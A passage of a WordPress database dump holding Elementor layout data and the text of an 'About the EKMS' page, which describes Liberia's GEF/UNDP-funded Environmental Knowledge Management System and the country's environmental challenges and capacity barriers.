"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,400px,450px,auto,auto\\\" term=\\\"resource_tag:epa\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12251,1186,'_bbp_engagement','3'),(12252,1356,'_bbp_engagement','2'),(12253,1638,'_bbp_engagement','2'),(12254,1639,'_bbp_engagement','2'),(12255,1640,'_bbp_engagement','2'),(12256,1641,'_bbp_engagement','2'),(12257,1642,'_bbp_engagement','2'),(12258,1643,'_bbp_engagement','2'),(12259,1644,'_bbp_engagement','2'),(12260,1645,'_bbp_engagement','2'),(12261,1649,'_bbp_engagement','2'),(12262,1650,'_bbp_engagement','2'),(12263,1651,'_bbp_engagement','2'),(12264,1652,'_bbp_engagement','2'),(12265,1679,'_bbp_engagement','2'),(12266,1681,'_bbp_engagement','2'),(12267,1683,'_bbp_engagement','2'),(12269,1686,'_bbp_engagement','2'),(12270,1687,'_bbp_engagement','2'),(12271,1689,'_bbp_engagement','2'),(12272,1690,'_bbp_engagement','2'),(12273,1692,'_bbp_engagement','2'),(12274,1179,'_bbp_reply_count_hidden','0'),(12275,1179,'_bbp_total_reply_count_hidden','0'),(12276,1176,'_bbp_reply_count_hidden','0'),(12277,1176,'_bbp_total_reply_count_hidden','0'),(12278,1174,'_bbp_reply_count_hidden','0'),(12279,1174,'_bbp_total_reply_count_hidden','0'),(12280,975,'_bbp_reply_count_hidden','0'),(12281,975,'_bbp_total_reply_count_hidden','0'),(12289,1998,'_elementor_edit_mode','builder'),(12290,1998,'_elementor_template_type','wp-page'),(12291,1998,'_elementor_version','2.7.5'),(12292,1998,'_wp_page_template','default'),(12293,1998,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width:100%\\\">\\n  <tr>\\n    <th><strong>Project Name<\\/strong><\\/th>\\n    <th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n <\\/tr>\\n  <tr>\\n    <td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n    <td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty. <\\/td>\\n     <\\/tr>\\n  <tr>\\n    <td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n    <td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n   <\\/tr>\\n<tr>\\n    <td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC) <\\/td>\\n    <td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n   <\\/tr>\\n<\\/table>\\n<h3>B. Strategy<\\/h3><h4>B.1 Alternative Strategies<\\/h4><p>\\nDuring the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia.  An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project .  A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.\\n<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12301,2000,'_elementor_edit_mode','builder'),(12302,2000,'_elementor_template_type','wp-page'),(12303,2000,'_elementor_version','2.7.5'),(12304,2000,'_wp_page_template','default'),(12305,2000,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental 